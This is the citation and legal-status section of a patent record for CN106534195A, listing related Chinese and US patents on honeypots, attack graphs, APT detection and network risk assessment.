CN110022288A (en) * 2018-01-10 2019-07-16 贵州电网有限责任公司遵义供电局 A kind of APT threat recognition methods
CN108446557B (en) * 2018-03-12 2020-07-14 江苏中天科技软件技术有限公司 Security threat active sensing method based on honeypot defense
CN108462714A (en) * 2018-03-23 2018-08-28 中国人民解放军战略支援部队信息工程大学 A kind of APT systems of defense and its defence method based on system resilience
CN108809959A (en) * 2018-05-23 2018-11-13 郑州信大天瑞信息技术有限公司 A kind of attack portrait method
CN109413109B (en) * 2018-12-18 2021-03-05 中国人民解放军国防科技大学 Heaven and earth integrated network oriented security state analysis method based on finite-state machine
CN110011982B (en) * 2019-03-19 2020-08-25 西安交通大学 Intelligent attack decoy system and method based on virtualization
CN110213301B (en) * 2019-07-11 2021-09-03 武汉思普崚技术有限公司 Method, server and system for transferring network attack plane
CN110933032B (en) * 2019-10-25 2022-04-05 湖南麒麟信安科技股份有限公司 SSH path tracking method, system and medium
CN110677438A (en) * 2019-11-15 2020-01-10 杭州安恒信息技术股份有限公司 Attack chain construction method, device, equipment and medium
CN111371758B (en) * 2020-02-25 2022-03-25 东南大学 Network spoofing efficiency evaluation method based on dynamic Bayesian attack graph
US11689568B2 (en) 2020-05-08 2023-06-27 International Business Machines Corporation Dynamic maze honeypot response system
CN111885041A (en) * 2020-07-17 2020-11-03 福建奇点时空数字科技有限公司 Attack scene reconstruction method based on honeypot threat data
CN112367315B (en) * 2020-11-03 2021-09-28 浙江大学 Endogenous safe WAF honeypot deployment method
CN114285623B (en) * 2021-12-21 2023-01-20 北京永信至诚科技股份有限公司 Evaluation method and device for network security honeypot system indexes

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102413003A (en) * 2010-09-20 2012-04-11 中国科学院计算技术研究所 Method and system for detecting network security
CN103139220A (en) * 2013-03-07 2013-06-05 南京理工大学常熟研究院有限公司 Network security attack defense method using state attack and defense graph model
CN104348652A (en) * 2013-08-06 2015-02-11 南京理工大学常熟研究院有限公司 Method and device for evaluating system security based on correlation analysis
CN104539601A (en) * 2014-12-19 2015-04-22 北京航空航天大学 Reliability analysis method and system for dynamic network attack process
CN105681338A (en) * 2016-03-04 2016-06-15 西北大学 Vulnerability exploiting success probability calculation method and network security risk management method
CN105991521A (en) * 2015-01-30 2016-10-05 阿里巴巴集团控股有限公司 Network risk assessment method and network risk assessment device

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US9774616B2 (en) * 2012-06-26 2017-09-26 Oppleo Security, Inc. Threat evaluation system and method

Also Published As

Publication number Publication date
CN106534195A (en) 2017-03-22

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant